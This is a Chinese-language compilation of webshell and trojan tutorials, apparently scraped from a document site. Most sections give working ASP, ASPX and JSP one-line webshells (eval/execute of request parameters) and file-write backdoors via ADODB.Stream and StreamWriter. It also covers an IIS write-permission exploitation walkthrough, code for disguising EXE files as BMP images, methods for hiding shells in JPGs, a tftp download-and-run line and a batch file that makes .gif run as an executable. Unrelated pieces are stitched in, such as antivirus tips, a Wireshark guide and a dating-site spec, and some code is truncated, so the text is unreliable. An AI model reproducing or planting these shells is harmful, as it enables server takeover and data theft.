一句话木马

ASPX一句话木马

程序代码

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 程序代码

<%@ Page Language="Jscript"

validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"un safe"));%>

//Jscript的https://www.360docs.net/doc/d22643462.html,一句话

程序后门代码

<%if (Request.Files.Count!=0)

{ Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>

//C#的https://www.360docs.net/doc/d22643462.html,一句话

程序代码

<% If Request.Files.Count <> 0 Then

Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>

VB的https://www.360docs.net/doc/d22643462.html,一句话木马

第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入

所以可以试用 4. 调用图片后门代码： 工具：UltraEdit

C#判断上传文件是否是图片,防止木马上传

很多时候木马程序会伪装成其他格式的文件上传到网站，最常见的如图片格式。本文就以C #为例讲述C#判断上传文件是否是图片以防止木马上传的方法，具体方法如下： 方法一：用image对象判断是否为图片 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ///

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ///

01-Wireshark教程和3个实例

Wireshark教程 一、界面 二、认识数据包 网络的7层次结构：物理层、数据链路层、网络层、传输层、表示层、会话层、应用层物理层数据帧概况： 数据链路层以太网帧头部信息 MAC地址：是网卡的物理地址 前3组是表示生产厂家、后3组是厂家对网卡的编号 IP地址是我们定义的，可以随便更改 ARP协议就是用来对二者进行转换的

互联网层IP包头部信息 其它内容 三、过滤器设置 过滤器的区别 捕捉过滤器（CaptureFilters）：用于决定将什么样的信息记录在捕捉结果中。需要在开始捕捉前设置。显示过滤器（DisplayFilters）：在捕捉结果中进行详细查找。他们可以在得到捕捉结果后随意修改。 那么我应该使用哪一种过滤器呢？ 两种过滤器的目的是不同的。

捕捉过滤器是数据经过的第一层过滤器，它用于控制捕捉数据的数量，以避免产生过大的日志文件。 显示过滤器是一种更为强大（复杂）的过滤器。它允许您在日志文件中迅速准确地找到所需要的记录。 两种过滤器使用的语法是完全不同的。 显示过滤器 snmp || dns || icmp//显示SNMP或DNS或ICMP封包。 ip.addr == 10.1.1.1//显示来源或目的IP地址为10.1.1.1的封包。 ip.src==172.16.1.102 //显示来源是172.16.1.102的数据包 ip.src != 10.1.2.3 or ip.dst != 10.4.5.6//显示来源不为10.1.2.3或者目的不为10.4.5.6的封包。 ip.src != 10.1.2.3 and ip.dst != 10.4.5.6 //显示来源不为10.1.2.3并且目的IP不为10.4.5.6的封包。 tcp.port == 25//显示来源或目的TCP端口号为25的封包。 tcp.dstport == 25//显示目的TCP端口号为25的封包。 tcp.flags//显示包含TCP标志的封包。 tcp.flags.syn == 0x02//显示包含TCP SYN标志的封包。 可以从上面看过滤器设置的规则 通过这里的背景可以判断使用的语法是否正确：红色背景表示语法错误，绿色背景表示正确并且可以运行，黄色背景表示语法正确，但是可能没有结果。 1、使用字段名来过滤 在过滤器中输入：http.request.method==”GET” ，将显示使用GET方法获取数据的所有包

巧用技巧揪出图片背后的木马病毒

巧用技巧揪出图片背后的木马病毒 导读:木马病毒属于病毒的一类，主要是进行盗取账号密码信息、远程控制用户电脑、破坏操作系统等操作。并且，为了防止杀毒软件对它的查杀，通常具有很强的隐蔽性和反侦察性。多数木马病毒感染后，首先试图强行关闭杀毒软件，然后才开始盗取账号，有的木马病毒甚至会将国内外主流杀毒软件先各个击破。 最近一段时间，从各大杀毒软件厂商发布的病毒报告中可以看到，木马病毒目前在互联网上泛滥情况十分严重，并且已经形成完整的病毒产业链。它是如何入侵电脑?作为普通网民又应如何防范? 有许多的用户发现自己的电脑有问题，但却找不出原因，是中了木马不假，但就是找不出是哪的问题，后来监测到有数据在上传时，在图片中找到了藏于其中的木马病毒，也终于把它揪出来了。看一下具体内容： 攻击者利用微软GDIplus安全漏洞将木马藏于图片中，注意是藏而不是捆绑，这个不同于以前把木马伪装成图片，引诱网民去点击，而是实实在在的图片变成了木马。受微软GDIplus安全漏洞影响，几乎所有浏览器、即时聊天工具、Office 程序以及看图软件等都可能成为木马传播的渠道。只要通过浏览器浏览、看图软件打开、甚至是QQ、MSN、电子邮件、Office文档里查看这些图片，就会中招!管你是一个QQ表情还是一个有着上万个层的PNG图片，看了就木马你!这个安全漏洞就是微软GDIplus图片漏洞，堪称是微软有史以来最大的安全漏洞。 GDIplus是一种图形设备接口，能够为应用程序和程序员提供二维矢量图形、映像和版式。GdiPlus.dll通过基于类的API提供对各种图形方式的访问。它在解析特制的BMP文件时存在整数溢出漏洞，利用此漏洞的攻击者可完全控制系统，可通过这个漏洞安装更多的木马程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。这个GDIplus漏洞非常严重，类似以前的光标漏洞和wmf 漏洞，但是涉及范围广，几乎涵盖了所有的图形格式。 了解了以上的问题，电脑用户就要慎重对待自己收到的图片了，一定要先杀一杀病毒再打开，以防中招，但这个问题也是可以解决的，因为微软GDIplus安全漏洞的专门补丁也已出现了，只要下载运行就把问题化险为夷了。 养成良好的上网习惯。大量的木马都是通过非法网站等进行传播; 提高个人安全意识。如收到陌生邮件不要打开附件，带有链接的QQ或者MSN留言时不要点击，插入U盘后先杀毒再拷贝文件等; 如果电脑已经感染木马病毒，首先要升级杀毒软件到最新版本后再进行全盘杀毒。还可以向瑞星等这样的专业反病毒厂商寻求帮助。 木马病毒确实危害巨大，但相信随着国家对电脑病毒、网络犯罪打击力度的不断加大和相关法律出台，地下木马产业链会逐步被消除。 养成以上好的习惯,可以防范自己的电脑感染木马,赶紧哦.

题目11：IIS write漏洞利用

关卡十一 题目：IIS Write漏洞利用 关卡描述： IIS写权限对网站系统的安全是致命的，拥有写权限可以直接往网站目录写文件，在拥有写权限的服务器上，其安全相对设置薄弱，因此比较容易被入侵者控制。写权限漏洞严格意义上讲其实不算是漏洞，因为网站内容始终是要进行编辑和修改的。只有对文件的权限分配不慎才会造成写权限被利用，进而被植入木马等情况的发生。 建议： 1、如果是纯静态页网站，请不要添加写入与删除功能，那么你的空间就是百毒不侵。 2、如果有写入权限，无修改与删除功能，那么你的网站也是非常安全的，就算有入侵它所有写入的文件都不能更改（留下足迹）而你网站本身的文件也是相当安全。唯一的是可能会写入很多垃圾文件。 3、如果有修改权限，那么与有删除权限其实是一样的。因为一个文件就算删除不了，我把内容清空那与删除这个文件是一样的效果。所以分配这些权限需要小心谨慎。 答案提交： 1、请提交获取的KEY值。 参考步骤：

1.进入关卡十一： 2.获取目标主机ip地址 3.打开工具场景windows xp

4.C：\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描 5.目标系统中搭建网站存在该漏洞，鼠标右击会看到浏览、上传、导出等选项 6.选择put file测试一下，默认有该软件作者写的一个alert.txt文件，点击put，提示上传成功.如图：

打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件，且内容和软件里的一致 但是直接通过该软件写个asp木马上传是不行的。

使用iiswrite.exe上传内容为<%execute (request("lele"))%> 的文本文件## <%eval request(“a”)%> 在桌面先新建一个aa.txt文档,内容如下 然后通过使用iiswrite.exe上传文本文件。

找出隐藏在图片背后的木马病毒

找出隐藏在图片背后的木马病毒 木马病毒属于病毒的一类，主要是进行盗取账号密码信息、远程控制用户电脑、破坏操作系统等操作。并且，为了防止杀毒软件对它的查杀，通常具有很强的隐蔽性和反侦察性。多数木马病毒感染后，首先试图强行关闭杀毒软件，然后才开始盗取账号，有的木马病毒甚至会将国内外主流杀毒软件先各个击破。 最近一段时间，从各大杀毒软件厂商发布的病毒报告中可以看到，木马病毒目前在互联网上泛滥情况十分严重，并且已经形成完整的病毒产业链。它是如何入侵电脑?作为普通网民又应如何防范? 有许多的用户发现自己的电脑有问题，但却找不出原因，是中了木马不假，但就是找不出是哪的问题，后来监测到有数据在上传时，在图片中找到了藏于其中的木马病毒，也终于把它揪出来了。 看一下具体内容：攻击者利用微软GDIplus安全漏洞将木马藏于图片中，注意是藏而不是捆绑，这个不同于以前把木马伪装成图片，引诱网民去点击，而是实实在在的图片变成了木马。受微软GDIplus安全漏洞影响，几乎所有浏览器、即时聊天工具、Office程序以及看图软件等都可能成为木马传播的渠道。只要通过浏览器浏览、看图软件打开、甚至是QQ、MSN、电子邮件、Office文档里查看这些图片，就会中招!管你是一个QQ表情还是一个有着上万个层的PNG图片，看了就木马你!这个安全漏洞就是微软GDIplus图片漏洞，堪称是微软有史以来最大的安全漏洞。 GDIplus是一种图形设备接口，能够为应用程序和程序员提供二维矢量图形、映像和版式。GdiPlus.dll通过基于类的API提供对各种图形方式的访问。它在解

析特制的BMP文件时存在整数溢出漏洞，利用此漏洞的攻击者可完全控制系统，可通过这个漏洞安装更多的木马程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。这个GDIplus漏洞非常严重，类似以前的光标漏洞和wmf漏洞，但是涉及范围广，几乎涵盖了所有的图形格式。 了解了以上的问题，电脑用户就要慎重对待自己收到的图片了，一定要先杀一杀病毒再打开，以防中招，但这个问题也是可以解决的，因为微软GDIplus安全漏洞的专门补丁也已出现了，只要下载运行就把问题化险为夷了。 养成良好的上网习惯。大量的木马都是通过非法网站等进行传播。 提高个人安全意识。如收到陌生邮件不要打开附件，带有链接的QQ或者MSN 留言时不要点击，插入U盘后先杀毒再拷贝文件等。 如果电脑已经感染木马病毒，首先要升级杀毒软件到最新版本后再进行全盘杀毒。还可以向瑞星等这样的专业反病毒厂商寻求帮助。 木马病毒确实危害巨大，但相信随着国家对电脑病毒、网络犯罪打击力度的不断加大和相关法律出台，地下木马产业链会逐步被消除。 养成以上好的习惯,可以防范自己的电脑感染木马，赶紧哦。 文章来自：https://www.360docs.net/doc/d22643462.html,/a/zjzs/1904.html

黑客技巧之利用图片做木马应用完全解析

黑客技巧之利用图片做木马应用完全解析 何谓BMP网页木马？它和过去早就用臭了的MIME头漏洞的木马不同，MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件，放到网页上利用IE和OE 的编码漏洞实现自动下载和执行。 然而BMP木马就不同，它把一个EXE文件伪装成一个BMP图片文件，欺骗IE自动下载，再利用网页中的JA V ASCRIPT脚本查找客户端的Internet临时文件夹，找到下载后的BMP 文件，把它拷贝到TEMP目录。再编写一个脚本把找到的BMP文件用DEBUG还原成EXE，并把它放到注册表启动项中，在下一次开机时执行。但是这种技术只能在Windows9X下发挥作用，对于Windows2000、WindowsXP来说是无能为力了。 看上去好象很复杂，下面我们一步一步来： EXE变BMP的方法 大家自己去查查BMP文件资料就会知道，BMP文件的文件头有54个字节，简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度，我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦)，这样就可以欺骗IE下载该BMP文件，开始我们用JPG文件做过试验，发现如果文件头不正确的话，IE是不会下载的，转换代码如下： program exe2bmp; uses Windows, SysUtils; var len,row,col,fs: DWORD; buffer: array[0..255]of char; fd: WIN32_FIND_DATA; h,hw: THandle; begin if (ParamStr(1)’’) and(ParamStr(2)’’) then begin //如果运行后没有两个参数则退出 if FileExists(ParamStr(1)) then begin FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow; col := 4; while true do begin if (fs mod 12)=0 then begin len:=fs; end else len:=fs+12-(fs mod 12); row := len div col div 3; if row>col then begin col:=col+4; end else Break;

手机看片陷阱多 看片下载多木马

手机看片陷阱多看先下载多木马 社会在不断的进步，节奏越来越快，每个人都面临着巨大的压力。而黄色图片，三级片乃至黄色电影成为人们排遣压力的一个重要途径。然而随着快播被封，广大的撸友们失去了重要的看片来源。而这让一些不玩分子看到了契机，他们假借各种手机看片APP来达到所谓的不正当目的目的。 那么关于这些所谓的手机看片神器你又了解多少?手机看片又通过怎样的途径达到不法目的。一“挂羊头卖狗肉” 一些手机看片APP，打着所谓的手机看片神器旗号，号称什么电影都能看。尤其是在下载页面配上一些黄色图片和黄色电影的图片，来吸引人们下载，达到所谓的盈利目的。 可是等到用户们点击进入之后，大失所望发现什么都没有，只是一个粗制滥造的电影播放器。还掺杂着许多广告。典型的“挂羊头卖狗肉”。 二以色情视频和黄色电影付费观看诈骗 当然如果只是利用一些黄色图片和黄色电影的截图来达到欺骗你下载手机看片APP的目的，这还算好的。有些黑心的商家在你下载了他们所谓的手机看片神器和手机看片软件之后，更

是在里面涉及大量的权限，让你进行充值。 而你充值之后发现，他们所谓的电影也都是假的，就是利用人们的欲望来达到不法的商业目的。 三盗取信息的木马病毒和流氓软件 一旦你下载了这样的手机看片软件，那么你的手机就面临着严重的危险。这类软件往往以诱惑性的内容，如黄色图片，成人电影，或者ps上一些成人网站的内容来诱惑手机用户下载他们所谓的手机看片神器。 然而这根本就是病毒和流氓软件。你一旦下载之后就发现，他会让你下载许多的绑定软件，还会获取你大量的使用权限。而且是你想停止下载都很困难。一旦遇到这样的手机看片神器，你能做的就是恢复出厂设置，进行严密的杀毒。这样才能保证安全。 手机成为生活中必不可少的一部分，我们的手机中有着大量的APP软件在方便着我们的生活。然而一些手机APP确实所谓的流氓软件，尤其是一些手机看片APP，手机看片神器等更是如此。所以不要相信所谓的手机看片神器，因为那些手机看片软件往往是利用你的欲望，来达到不法的目的。

修复明细-带图片

首先检查系统漏洞，找出木马来，修补漏洞，防止被黑 第一部分： 以下是界面修改（功能网站基本都有） 首页： 顶部：参看图片“首页”顶部第一行是泰山脚下。。。。。等一行文字介绍，前面是固定的文字，后面是根据搜索者搜索的关键词和搜索者的IP自动变化的关键词 （相关搜索泰安征婚网 |泰安婚介网 | 泰安交友网 | 泰安男士征婚 | 泰安女士征婚 | 泰安单身俱乐部 | 泰安免费征婚网 |泰安征婚 |泰山情缘婚恋网以上这个泰安这个地区随访问者搜索自动变更对方城市） 其他栏目，都看图片。可以参照下扬州交友网的首页。注意：其他栏目的截图我没有画上顶部的这个样子，不过其他页面也依旧按照这个样子，而不是原来扬州交友网顶部的样子。 登录后顶部提示，见图片。

注册：参看图片注册1、注册2、 第一步：参照扬州交友网的注册页面。每个项目的提示可以参照扬州交友网的注册提示。增加了个性描述，要寻找的类型

第二部：在扬州交友网注册的第二部基础上，“我的资料中”增加个上一步的导航 第三部：参看图片“上传照片1-2” 第四部：上传照片后进行裁剪见图片：“裁剪照片“这个功能是新加的。

开始寻缘：见图片“注册成功暂不设定形象照片后出现页面.”这个图片注册完成第4部后也是出现这个页面。 注册成功后页面：就是寻缘的那个页面，也是注册后不设定相片出现的页面， 见图片“注册成功暂不设定形象照片后出现页面” 详细资料： 调整下界面，底部那几个项目搞成图片的显示样式。见图片“详细资料” 会员管理首页：原来的谁看过我，增加到6条显示。增加今日速配，把最新活动

哪个项目显示出来，见图片“谁看过我” 新会员： 这个页面右下面增加个个连接图片，样式如图片，有连接。婚恋页面右下角增加的一样。。光明榜和搜索考前的窗口，连接到：my/k_bidding.php 资料页面：

L003001041-一句话木马测试分析

课程编写 别内容 题名称L003001041-一句话木马测试分析 与要求熟悉一句话木马的原理，掌握一句话木马的使用以及防御方法 (虚拟PC）操作系统类型：windows server 2003和windows XP professional，网络接口：本地连接连接要求PC 网络接口，本地连接与实验网络直连 描述中国菜刀 环境描述1、学生机与实验室网络直连； 2、VPC1与实验室网络直连； 3、学生机与VPC1物理链路连通； 知识 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码： <%execute request("value")%> 其中value是值，所以你可以更改自己的值，前面的request就是获取这个值 <%eval request("value")%>(现在比较多见的，而且字符少，对表单字数有限制的地方特别的当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。 （不知道数据库也可以request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。） 这就被称为一句话木马，它是基于B/S结构的。 内容理解该漏洞的实现过程

步骤 学生登录实验场景的操作 1、学生单击“网络拓扑”进入实验场景，单击windows2003中的“打开控制台”按钮，进入目标 我们把windows2003机器作为服务机（ip地址为192.168.1.154，不固定） 2、学生输入账号Administrator ,密码123456，登录到实验场景中的Windows server 2003，在该网站，并且能够正常访问。如图所示:

制作图片木马教程(如何制作图片木马)

何谓BMP网页木马？它和过去早就用臭了的MIME头漏洞的木马不同，MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件，放到网页上利用IE和OE的编码漏洞实现自动下载和执行。 然而BMP木马就不同，它把一个EXE文件伪装成一个BMP图片文件，欺骗IE自动下载，再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹，找到下载后的BMP文件,把它拷贝到TEMP目录。再编写一个脚本把找到的BMP 文件用DEBUG还原成EXE，并把它放到注册表启动项中，在下一次开机时执行.但是这种技术只能在9X下发挥作用，对于2K、XP来说是无能为力了。 看上去好象很复杂,下面我们一步一步来: 1) EXE变BMP的方法 大家自己去查查BMP文件资料就会知道，BMP文件的文件头有54个字节，简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度。我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦)，这样就可以欺骗IE下载该BMP文件，开始我们用JPG 文件做过试验，发现如果文件头不正确的话，是不会下载的，转换代码如下：

FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow; col := 4; while true do begin if (fs mod 12)=0 then begin len:=fs; end else len:=fs+12-(fs mod 12); row := len div col div 3; if row>col then begin col:=col+4; end else Break; end; FillChar(buffer,256,0); {一下为BMP文件头数据} Buffer[0]:='B';Buffer[1]:='M'; PDWORD(@buffer[18])^:=col; PDWORD(@buffer[22])^:=row; PDWORD(@buffer[34])^:=len; PDWORD(@buffer[2])^:=len+54; PDWORD(@buffer[10])^:=54; PDWORD(@buffer[14])^:=40; PWORD(@buffer[26])^:=1;

asp一句话木马原理分析

asp一句话木马原理分析 通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候，不出现“编译错误，缺少脚本关闭标志%>” 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request(“a”)%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码<%execute request(“a”)%>可以这样来解释： <% if request(“a”)<>”“ then execute request(“a”) %> 如果a不为空的时候执行.执行什么呢?... if a != 0 下面我们来看一下客户端: <form action=http://192.168.0.28/shell.asp method=post> <textarea name=l cols=120 rows=10 width=45> set lP=server.CreateObject(“Adodb.Stream”) …创建Adodb.Stream组件.. lP.Open lP.Type=2 lP.CharSet=“gb2312” - 1 -

lP.writetext request(“p”) lP.SaveToFile server.mappath(“dbbak.asp”),2 lP.Close set lP=nothing response.redirect “dbbak.asp” </textarea> <textarea name=p cols=120 rows=10 width=45>要提交的数据</textarea><BR><center><br> <input type=submit value=提交> Adodb.Stream负责上传读取数据到服务器: 组件：”Adodb.Stream” 有下列方法： Cancel 方法 使用方法如下 Object.Cancel 说明：取消执行挂起的异步Execute 或Open 方法的调用。 WriteText 方法 使用方法如下： Object.Write(Data,[Options]) 说明：将指定的文本数据装入对像中。 参数说明：Data 为指定的要写入的内容。 Options 写入的选项，可不指定，可选参数如下： adWriteChar =0 adWriteLine =1 SaveToFile 方法 使用方法如下： Object.SaveToFile(FileName,[Options]) 说明：将对像的内容写到FileName指定的文件中 也就是我们保存木马的文件名dbbak.asp 参数说明：FileName指定的文件 - 2 -

一句话木马图片制作(三种方法)

图片木马制作的三种方法 Copy命令制作 1.asp内容： 打开cmd，数据一下命令： 此时打开两个jpg文件，相比： 且打开2.jpg可以像1.jpg一样显示图像。 把以下代码放入目标网站，即可按asp执行。 <% #include files=”2.jpg”%> Uedit32（转载）： 本制作来自于：雪糕。 我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误： Microsoft VBScript 运行时错误错误'800a000d' 类型不匹配: 'execute' /news1/show.asp，行 3 所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码： 这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。 制作步骤： 一、前期准备 材料： 1.一张图片：1.jpg 2.一句话木马服务器端代码： <%execute request("value")%>（其他的一句话也行） 3.一句Script标签： 4. 调用图片后门代码： 工具：UltraEdit 二、开始制作： 1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>” 其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；

如何防范木马和病毒的攻击

如何防范木马及病毒的攻击 一、计算机中毒有哪些症状？ 人生病了，会有各种各样的症状，同样，电脑中毒了也会有一些中毒反应。如果你的电脑有如下症状，要赶紧用杀毒软件查个毒了。 1.经常死机； 2.文件打不开； 3.经常报告内存不够； 4.提示硬盘剩余空间不足； 5.出现大量来历不明的文件； 6.数据无端丢失； 7.系统运行速度变慢； 8.操作系统自动执行操作。 二、木马病毒 大家一定都听说过木马病毒，但木马病毒到底是什么呢？ （一）木马病毒 木马病毒是指通过特定的程序（木马程序）来控制另一台计算机。木马通常有两个可执行程序：一个是控制端，另一个是被控制端。木马这个名字来源于古希腊传说（荷马史诗中木马计的故事，Trojan一词的特洛伊木马本意是“特洛伊的”，即代指特洛伊木马，也就是木马计的故事）。“木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种主机的

门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全运行。 （二）木马病毒的种类 木马不是马，但是它也有不同的品种，让小笔记给大家介绍一下常见的木马变种吧。 1.网游木马 网络游戏木马通常采用记录用户键盘输入、Hook游戏进程、API 函数等方法获取用户的密码和帐号。窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。 网络游戏木马的种类和数量，在国产木马病毒中都首屈一指。流行的网络游戏无一不受网游木马的威胁。一款新游戏正式发布后，往往在一到两个星期内，就会有相应的木马程序被制作出来。大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。 2.网银木马 网银木马是针对网上交易系统编写的木马病毒，其目的是盗取用户的卡号、密码，甚至安全证书。此类木马种类数量虽然比不上网游木马，但它的危害更加直接，受害用户的损失更加惨重。 网银木马通常针对性较强，木马作者可能首先对某银行的网上交易系统进行仔细分析，然后针对安全薄弱环节编写病毒程序。2013年，安全软件电脑管家截获网银木马最新变种“弼马温”，弼马温病毒能够毫无痕迹的修改支付界面，使用户根本无法察觉。通过不良网站提供假QVOD下载地址进行广泛传播，当用户下载这一挂马播放

一句话木马原理详解

一句话木马原理详解 eval(Request.form('#')+'') 来解释下它的原理. 首先是JavaScript脚本的开始标记,其中RUNA T属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name 值被命名为#的部分,例如如下摘自一句话客户端的代码: set iP=server.createObject("Adodb.Stream") iP.Open iP.Type=2 iP.CharSet="gb2312" iP.writetext request("aoyun") iP.SaveToFile server.mappath("aoyunwan.asp"),2 iP.Close set iP=nothing response.redirect "aoyunwan.asp" 学过html的朋友应该注意到了在textarea标记中的name属性被

赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了: set iP=server.createObject("Adodb.Stream") iP.Open iP.Type=2 iP.CharSet="gb2312" iP.writetext request("aoyun") iP.SaveToFile server.mappath("aoyunwan.asp"),2 iP.Close set iP=nothing response.redirect "aoyunwan.asp" 学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用该对象的writetext方法将request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea标记中的内容,也就是我们的大马的代码)写入服务端的aoyunwan.asp文件中,写入结束后使用set iP=nothing 释放Adodb.Stream对象然后使用response.redirect "aoyunwan.asp" 转向刚才写入大马代码的文件,也就是我们最后看见的大马了! 不过一句话木马能成功的条件依赖于两个条件:一、服务器端没有禁止Adodb.Stream组件，因为我们使用一句话木马写入大马代码的条件是服务器端创建Adodb.Stream组件，如果该组件被禁用的话

gif文件当做木马exe来运行

gif文件当做木马exe来运行 2010-06-20 14:52 更改exe为gif： Code： ----------------------------------------------------------------------------------------------------------------------------------------------------------- @echo off color 1A ECHO Windows Registry Editor Version 5.00>gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg ECHO "Content Type"="application/x-msdownload">>gif.reg ECHO @="exefile">>gif.reg regedit /s gif.reg>nul 2>nul del /s gif.reg>nul 2>nul ----------------------------------------------------------------------------------------------------------------------------------------------------------- 这个代码保存成.BAT的文件。 先运行这个BAT文件系统会把.GIF文件来当做应用程序来运行 当然我们的木马后缀要换成.GIF 的，嘻嘻。 恢复gif默认： Code： ----------------------------------------------------------------------------------------------------------------------------------------------------------- @echo off color 1A ECHO Windows Registry Editor Version 5.00>gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg ECHO "Content Type"="image/gif">>gif.reg ECHO @="giffile">>gif.reg regedit /s gif.reg>nul 2>nul del /s gif.reg>nul 2>nul ----------------------------------------------------------------------------------------------------------------------------------------------------------- 这个代码保存成.BAT的文件。

ASPX一句话木马--终极版详细分析

首先回顾一下以前ASP一句话的经典木马吧！ <%if request("nonamed")<>"" then execute request("nonamed")%> VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP 一句话木马也有个版本是采用JSCRIPT的eval的！网上也有例子我就不多说了！..... 然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了！ 之前ASP中正常情况只支持VBS JSCRIPT(像python perlscript 这些特例的我就不说了)... 如今ASPX中所支持的VBS的高级版本VB已经不存在execute这个独有的方法....真遗憾.... 同时Jscript 也一样转向高级版本https://www.360docs.net/doc/d22643462.html, 但是我们需要的eval函数还是生存下来的！script child有幸了... 先埋下一个伏笔吧~ 先谈谈如今的中间语言WEB应用中的一句话 JSP :<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParame ter("t").getBytes()); %> 这个是我自己写的要弹要说,都是大家的呵呵！我不发言..... ASPX:<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close() %> 这个不知道是谁的作品,感觉性质有点像我的JSP一句话了！不过还是把简单的shell实现了！支持ing.... 两个一句话大体都一样调用类把接收的都写到文件！简单说就是对文件写操作而已！~昔日ASP 一句话的光辉如今在中间语言的后门中给限制得荡然无存~~错！......ASPX C/S木马我们一样可以实现！因为有https://www.360docs.net/doc/d22643462.html,的存在！上面所说到的eval函数还生存着！~ OK我们先来实现 <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["nonamed"]));%> 这样？恩！可以拿去尝试了~ 保存为text.aspx 然后提交 http://127.0.0.1/text.aspx?nonamed=var%20mydate%20=%20new%20Date(); 打印出当前时间...Sat Aug 4 20:05:20 UTC+8 2007 貌似OK了哦！呵呵我们再试 http://127.0.0.1/text.aspx?nonamed=Server.MapPath("."); 发现报告错误了！....(我就是因为卡在这里,所以折腾了几个月,不然这文章早出炉了！在这里感谢一下闇の術士QQ:4659675 欢迎大家找他学习...哈) 错误原因 { 安全性异常 说明: 应用程序试图执行安全策略不允许的操作。要授予此应用程序所需的权限，请与系统管理员联系，或在配置文件中更改该应用程序的信任级别。 异常详细信息: System.Security.SecurityException: 请求失败。 } 为什么会这样呢？OK我们找到MS文档 往下面看 https://www.360docs.net/doc/d22643462.html,/library/chs/default.asp?url=/library/CHS/jscript7/html/jsmscStartPage.asp JScript .NET JScript .NET 的新增功能 JScript .NET 是下一代的Microsoft JScript 语言，它是使用Web语言方便快捷地访问